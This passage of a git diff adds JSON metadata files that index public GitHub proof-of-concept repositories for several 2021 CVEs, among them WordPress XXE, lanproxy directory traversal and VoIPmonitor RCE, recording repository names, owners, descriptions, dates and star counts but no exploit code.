"https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/wordpress_cve-2021-29447", + "description": "WordPress XXE vulnerability", + "fork": false, + "created_at": "2021-05-23T14:08:34Z", + "updated_at": "2024-08-12T20:13:17Z", + "pushed_at": "2021-05-23T14:11:04Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 372785442, + "name": "CVE-2021-29447", + "full_name": "dnr6419\/CVE-2021-29447", + "owner": { + "login": "dnr6419", + "id": 43310843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4", + "html_url": "https:\/\/github.com\/dnr6419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-29447", + "description": "Wordpress XXE injection 구축 자동화 및 PoC ", + "fork": false, + "created_at": "2021-06-01T10:10:25Z", + "updated_at": "2022-02-11T16:48:24Z", + "pushed_at": "2022-01-10T07:07:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 400614016, + "name": "CVE-2021-29447", + "full_name": "AssassinUKG\/CVE-2021-29447", + "owner": { + "login": "AssassinUKG", + "id": 5285547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5285547?v=4", + "html_url": "https:\/\/github.com\/AssassinUKG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AssassinUKG\/CVE-2021-29447", + "description": null, + "fork": false, + "created_at": "2021-08-27T19:20:20Z", + "updated_at": "2021-08-27T19:25:06Z", + "pushed_at": "2021-08-27T19:25:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 562278922, + "name": "CVE-2021-29447-POC", + "full_name": "b-abderrahmane\/CVE-2021-29447-POC", + "owner": { + "login": "b-abderrahmane", + "id": 10504574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10504574?v=4", + "html_url": "https:\/\/github.com\/b-abderrahmane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b-abderrahmane\/CVE-2021-29447-POC", + "description": null, + "fork": false, + "created_at": "2022-11-05T21:00:03Z", + "updated_at": "2022-11-16T04:06:35Z", + "pushed_at": "2023-12-15T05:23:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 562355122, + "name": "blind-xxe-controller-CVE-2021-29447", + "full_name": "elf1337\/blind-xxe-controller-CVE-2021-29447", + "owner": { + "login": "elf1337", + "id": 100080509, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100080509?v=4", + "html_url": "https:\/\/github.com\/elf1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elf1337\/blind-xxe-controller-CVE-2021-29447", + "description": "Arbitrary file read controller based on CVE-2021-29447", + "fork": false, + "created_at": "2022-11-06T04:26:20Z", + "updated_at": "2023-04-28T22:17:00Z", + "pushed_at": "2022-11-11T06:27:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 562453027, + "name": "CVE-2021-29447-POC", + "full_name": "Val-Resh\/CVE-2021-29447-POC", + "owner": { + "login": "Val-Resh", + "id": 80176765, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80176765?v=4", + "html_url": "https:\/\/github.com\/Val-Resh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Val-Resh\/CVE-2021-29447-POC", + "description": "Proof of Concept for CVE-2021-29447 written in Python", + "fork": false, + "created_at": "2022-11-06T12:13:31Z", + "updated_at": "2022-11-07T01:04:59Z", + "pushed_at": "2022-11-06T12:59:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-29447", + "ethical-hacking", + "hack-the-box", + "hackthebox", + "proof-of-concept", + "wordpress", + "wordpress-security", + "xxe" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 564953103, + "name": "wordpress-cve-2021-29447", + "full_name": "M3l0nPan\/wordpress-cve-2021-29447", + "owner": { + "login": "M3l0nPan", + "id": 47189098, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47189098?v=4", + "html_url": "https:\/\/github.com\/M3l0nPan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M3l0nPan\/wordpress-cve-2021-29447", + "description": "Exploit WordPress Media Library XML External Entity Injection (XXE) to exfiltrate files.", + "fork": false, + "created_at": "2022-11-11T22:41:45Z", + "updated_at": "2024-11-07T01:27:02Z", + "pushed_at": "2022-11-11T22:51:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-29447", + "exploit", + "python", + "wordpress", + "xxe", + "xxe-injection" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 565951989, + "name": "exploit_cve-2021-29447", + "full_name": "mega8bit\/exploit_cve-2021-29447", + "owner": { + "login": "mega8bit", + "id": 6804084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6804084?v=4", + "html_url": "https:\/\/github.com\/mega8bit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mega8bit\/exploit_cve-2021-29447", + "description": null, + "fork": false, + "created_at": "2022-11-14T17:05:27Z", + "updated_at": "2023-04-01T01:47:27Z", + "pushed_at": "2022-11-27T13:04:06Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 566137762, + "name": "CVE-2021-29447", + "full_name": "thomas-osgood\/CVE-2021-29447", + "owner": { + "login": "thomas-osgood", + "id": 20747585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20747585?v=4", + "html_url": "https:\/\/github.com\/thomas-osgood", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thomas-osgood\/CVE-2021-29447", + "description": "A Golang program to automate the execution of CVE-2021-29447", + "fork": false, + "created_at": "2022-11-15T03:15:59Z", + "updated_at": "2024-11-19T01:30:01Z", + "pushed_at": "2023-03-28T23:22:04Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 567344895, + "name": "CVE-2021-29447", + "full_name": "Abdulazizalsewedy\/CVE-2021-29447", + "owner": { + "login": "Abdulazizalsewedy", + "id": 64151982, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64151982?v=4", + "html_url": "https:\/\/github.com\/Abdulazizalsewedy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdulazizalsewedy\/CVE-2021-29447", + "description": null, + "fork": false, + "created_at": "2022-11-17T15:38:22Z", + "updated_at": "2022-11-19T14:46:56Z", + "pushed_at": "2022-11-21T01:06:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 581991750, + "name": "CVE-2021-29447", + "full_name": "G01d3nW01f\/CVE-2021-29447", + "owner": { + "login": "G01d3nW01f", + "id": 75846902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4", + "html_url": "https:\/\/github.com\/G01d3nW01f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2021-29447", + "description": null, + "fork": false, + "created_at": "2022-12-25T07:44:21Z", + "updated_at": "2022-12-25T07:59:06Z", + "pushed_at": "2022-12-25T08:47:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 587419306, + "name": "CVE-2021-29447", + "full_name": "viardant\/CVE-2021-29447", + "owner": { + "login": "viardant", + "id": 84291326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84291326?v=4", + "html_url": "https:\/\/github.com\/viardant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viardant\/CVE-2021-29447", + "description": "CVE-2021-29447 - Authenticated XXE Injection - WordPress < 5.7.1 & PHP > 8 ", + "fork": false, + "created_at": "2023-01-10T17:55:19Z", + "updated_at": "2023-01-17T16:08:43Z", + "pushed_at": "2023-01-17T16:16:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 592839280, + "name": "CVE-2021-29447-PoC", + "full_name": "0xRar\/CVE-2021-29447-PoC", + "owner": { + "login": "0xRar", + "id": 33517160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33517160?v=4", + "html_url": "https:\/\/github.com\/0xRar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xRar\/CVE-2021-29447-PoC", + "description": "A proof of concept exploit for a wordpress 5.6 media library vulnerability", + "fork": false, + "created_at": "2023-01-24T16:43:13Z", + "updated_at": "2024-08-14T06:42:03Z", + "pushed_at": "2023-01-31T21:37:34Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-29447", + "exploit-development", + "python3", + "websecurity", + "wordpress" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 631754459, + "name": "CVE-2021-29447", + "full_name": "andyhsu024\/CVE-2021-29447", + "owner": { + "login": "andyhsu024", + "id": 131547485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131547485?v=4", + "html_url": "https:\/\/github.com\/andyhsu024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andyhsu024\/CVE-2021-29447", + "description": null, + "fork": false, + "created_at": "2023-04-24T01:33:22Z", + "updated_at": "2023-04-24T01:33:23Z", + "pushed_at": "2023-04-30T15:23:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29505.json b/2021/CVE-2021-29505.json new file mode 100644 index 0000000000..9195749e23 --- /dev/null +++ b/2021/CVE-2021-29505.json @@ -0,0 +1,33 @@ +[ + { + "id": 374891682, + "name": "CVE-2021-29505", + "full_name": "MyBlackManba\/CVE-2021-29505", + "owner": { + "login": "MyBlackManba", + "id": 31227970, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31227970?v=4", + "html_url": "https:\/\/github.com\/MyBlackManba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MyBlackManba\/CVE-2021-29505", + "description": "对CVE-2021-29505进行复现,并分析学了下Xstream反序列化过程", + "fork": false, + "created_at": "2021-06-08T05:27:57Z", + "updated_at": "2022-06-06T07:31:56Z", + "pushed_at": "2021-06-08T05:55:57Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29627.json b/2021/CVE-2021-29627.json new file mode 100644 index 0000000000..19122fd27e --- /dev/null +++ b/2021/CVE-2021-29627.json @@ -0,0 +1,33 @@ +[ + { + "id": 357104598, + "name": "cve-2021-29627", + "full_name": "raymontag\/cve-2021-29627", + "owner": { + "login": "raymontag", + "id": 106421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106421?v=4", + "html_url": "https:\/\/github.com\/raymontag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raymontag\/cve-2021-29627", + "description": "Trigger-only for CVE-2021-29627", + "fork": false, + "created_at": "2021-04-12T07:51:03Z", + "updated_at": "2023-04-10T13:59:37Z", + "pushed_at": "2021-04-12T07:51:40Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30005.json b/2021/CVE-2021-30005.json new file mode 100644 index 0000000000..1ab3b6f533 --- /dev/null +++ b/2021/CVE-2021-30005.json @@ -0,0 +1,33 @@ +[ + { + "id": 250616831, + "name": "CVE-2021-30005-POC", + "full_name": "atorralba\/CVE-2021-30005-POC", + "owner": { + "login": "atorralba", + "id": 11612352, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11612352?v=4", + "html_url": "https:\/\/github.com\/atorralba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/atorralba\/CVE-2021-30005-POC", + "description": null, + "fork": false, + "created_at": "2020-03-27T18:41:07Z", + "updated_at": "2023-01-02T11:52:48Z", + "pushed_at": "2021-05-12T11:15:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3007.json b/2021/CVE-2021-3007.json new file mode 100644 index 0000000000..8b37f36502 --- /dev/null +++ b/2021/CVE-2021-3007.json @@ -0,0 +1,33 @@ +[ + { + "id": 368556385, + "name": "ZF3_CVE-2021-3007", + "full_name": "Vulnmachines\/ZF3_CVE-2021-3007", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/ZF3_CVE-2021-3007", + "description": "ZendFramework_CVE-2021-3007 PoC", + "fork": false, + "created_at": "2021-05-18T14:16:02Z", + "updated_at": "2024-08-12T20:13:07Z", + "pushed_at": "2021-05-18T14:17:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30109.json b/2021/CVE-2021-30109.json new file mode 100644 index 0000000000..1e9600d5bb --- /dev/null +++ b/2021/CVE-2021-30109.json @@ -0,0 +1,33 @@ +[ + { + "id": 354793600, + "name": "CVE-2021-30109", + "full_name": "Hackdwerg\/CVE-2021-30109", + "owner": { + "login": "Hackdwerg", + "id": 22836086, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22836086?v=4", + "html_url": "https:\/\/github.com\/Hackdwerg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hackdwerg\/CVE-2021-30109", + "description": "Froala Persistent XSS", + "fork": false, + "created_at": "2021-04-05T10:14:48Z", + "updated_at": "2021-04-29T02:56:24Z", + "pushed_at": "2021-04-06T10:44:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30128.json b/2021/CVE-2021-30128.json new file mode 100644 index 0000000000..dde9f13ec7 --- /dev/null +++ b/2021/CVE-2021-30128.json @@ -0,0 +1,33 @@ +[ + { + "id": 362903981, + "name": "CVE-2021-30128-EXP", + "full_name": "LioTree\/CVE-2021-30128-EXP", + "owner": { + "login": "LioTree", + "id": 12847578, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12847578?v=4", + "html_url": "https:\/\/github.com\/LioTree", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LioTree\/CVE-2021-30128-EXP", + "description": null, + "fork": false, + "created_at": "2021-04-29T17:59:59Z", + "updated_at": "2023-06-17T08:04:54Z", + "pushed_at": "2021-04-30T15:01:38Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30146.json b/2021/CVE-2021-30146.json new file mode 100644 index 0000000000..044ed0e27a --- /dev/null +++ b/2021/CVE-2021-30146.json @@ -0,0 +1,33 @@ +[ + { + "id": 355128115, + "name": "CVE-2021-30146", + "full_name": "Security-AVS\/CVE-2021-30146", + "owner": { + "login": "Security-AVS", + "id": 72926885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72926885?v=4", + "html_url": "https:\/\/github.com\/Security-AVS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Security-AVS\/CVE-2021-30146", + "description": "Seafile 7.0.5 Persistent XSS", + "fork": false, + "created_at": "2021-04-06T09:16:37Z", + "updated_at": "2023-12-15T06:39:19Z", + "pushed_at": "2021-04-06T09:19:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3019.json b/2021/CVE-2021-3019.json new file mode 100644 index 0000000000..cdd5f6534c --- /dev/null +++ b/2021/CVE-2021-3019.json @@ -0,0 +1,250 @@ +[ + { + "id": 328097281, + "name": "CVE-2021-3019", + "full_name": "B1anda0\/CVE-2021-3019", + "owner": { + "login": "B1anda0", + "id": 74232513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74232513?v=4", + "html_url": "https:\/\/github.com\/B1anda0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B1anda0\/CVE-2021-3019", + "description": "lanproxy 目录遍历漏洞批量检测 (CVE-2021-3019)", + "fork": false, + "created_at": "2021-01-09T07:11:38Z", + "updated_at": "2024-08-12T20:09:14Z", + "pushed_at": "2021-01-09T07:14:26Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 328546705, + "name": "CVE-2021-3019", + "full_name": "0xf4n9x\/CVE-2021-3019", + "owner": { + "login": "0xf4n9x", + "id": 40891670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4", + "html_url": "https:\/\/github.com\/0xf4n9x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2021-3019", + "description": "CVE-2021-3019 lanproxy目录遍历任意文件读取漏洞探测POC", + "fork": false, + "created_at": "2021-01-11T04:18:44Z", + "updated_at": "2024-10-07T04:08:12Z", + "pushed_at": "2021-03-19T14:42:49Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 329537345, + "name": "CVE-2021-3019", + "full_name": "Maksim-venus\/CVE-2021-3019", + "owner": { + "login": "Maksim-venus", + "id": 35008035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35008035?v=4", + "html_url": "https:\/\/github.com\/Maksim-venus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maksim-venus\/CVE-2021-3019", + "description": "lanproxy 目录遍历漏洞批量检测用户名密码POC (CVE-2021-3019)", + "fork": false, + "created_at": "2021-01-14T07:19:21Z", + "updated_at": "2024-08-12T20:09:24Z", + "pushed_at": "2021-01-14T07:52:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 346618078, + "name": "CVE-2021-3019", + "full_name": "murataydemir\/CVE-2021-3019", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-3019", + "description": "[CVE-2021-3019] LanProxy Directory Traversal", + "fork": false, + "created_at": "2021-03-11T07:40:44Z", + "updated_at": "2024-08-12T20:11:06Z", + "pushed_at": "2021-03-11T08:13:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 350235820, + "name": "cve-2021-3019", + "full_name": "Aoyuh\/cve-2021-3019", + "owner": { + "login": "Aoyuh", + "id": 48713040, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48713040?v=4", + "html_url": "https:\/\/github.com\/Aoyuh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aoyuh\/cve-2021-3019", + "description": "lanproxy(CVE-2021-3019)目录遍历", + "fork": false, + "created_at": "2021-03-22T06:44:07Z", + "updated_at": "2021-03-22T06:44:07Z", + "pushed_at": "2021-03-22T06:44:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 357764838, + "name": "CVE-2021-3019", + "full_name": "givemefivw\/CVE-2021-3019", + "owner": { + "login": "givemefivw", + "id": 65514141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65514141?v=4", + "html_url": "https:\/\/github.com\/givemefivw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/givemefivw\/CVE-2021-3019", + "description": null, + "fork": false, + "created_at": "2021-04-14T03:45:38Z", + "updated_at": "2024-08-12T20:12:08Z", + "pushed_at": "2021-04-14T03:53:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 402656166, + "name": "CVE-2021-3019-Lanproxy", + "full_name": "qiezi-maozi\/CVE-2021-3019-Lanproxy", + "owner": { + "login": "qiezi-maozi", + "id": 80675902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80675902?v=4", + "html_url": "https:\/\/github.com\/qiezi-maozi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qiezi-maozi\/CVE-2021-3019-Lanproxy", + "description": null, + "fork": false, + "created_at": "2021-09-03T05:24:41Z", + "updated_at": "2024-08-12T20:16:07Z", + "pushed_at": "2021-09-03T05:32:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 684997586, + "name": "CVE-2021-3019", + "full_name": "a1665454764\/CVE-2021-3019", + "owner": { + "login": "a1665454764", + "id": 143511005, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143511005?v=4", + "html_url": "https:\/\/github.com\/a1665454764", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/a1665454764\/CVE-2021-3019", + "description": "CVE-2021-3019", + "fork": false, + "created_at": "2023-08-30T09:41:09Z", + "updated_at": "2023-11-09T02:46:51Z", + "pushed_at": "2023-08-30T09:45:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30357.json b/2021/CVE-2021-30357.json new file mode 100644 index 0000000000..2ca924bb55 --- /dev/null +++ b/2021/CVE-2021-30357.json @@ -0,0 +1,33 @@ +[ + { + "id": 655433191, + "name": "CVE-2021-30357_CheckPoint_SNX_VPN_PoC", + "full_name": "joaovarelas\/CVE-2021-30357_CheckPoint_SNX_VPN_PoC", + "owner": { + "login": "joaovarelas", + "id": 6439813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6439813?v=4", + "html_url": "https:\/\/github.com\/joaovarelas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joaovarelas\/CVE-2021-30357_CheckPoint_SNX_VPN_PoC", + "description": "Proof-of-Concept for privileged file read through CheckPoint SNX VPN Linux Client ", + "fork": false, + "created_at": "2023-06-18T21:52:28Z", + "updated_at": "2023-09-11T10:32:54Z", + "pushed_at": "2023-06-20T10:27:14Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30461.json b/2021/CVE-2021-30461.json new file mode 100644 index 0000000000..09ba611285 --- /dev/null +++ b/2021/CVE-2021-30461.json @@ -0,0 +1,134 @@ +[ + { + "id": 365055978, + "name": "CVE-2021-30461", + "full_name": "daedalus\/CVE-2021-30461", + "owner": { + "login": "daedalus", + "id": 115175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115175?v=4", + "html_url": "https:\/\/github.com\/daedalus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daedalus\/CVE-2021-30461", + "description": "CVE-2021-30461", + "fork": false, + "created_at": "2021-05-06T22:50:32Z", + "updated_at": "2024-11-15T19:25:24Z", + "pushed_at": "2023-11-27T18:36:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-30461", + "poc", + "rce", + "voipmonitor" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 365180712, + "name": "CVE-2021-30461", + "full_name": "Vulnmachines\/CVE-2021-30461", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/CVE-2021-30461", + "description": "VOIP RCE", + "fork": false, + "created_at": "2021-05-07T09:22:01Z", + "updated_at": "2024-08-12T20:12:46Z", + "pushed_at": "2022-07-26T05:25:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 366251440, + "name": "CVE-2021-30461", + "full_name": "Al1ex\/CVE-2021-30461", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": 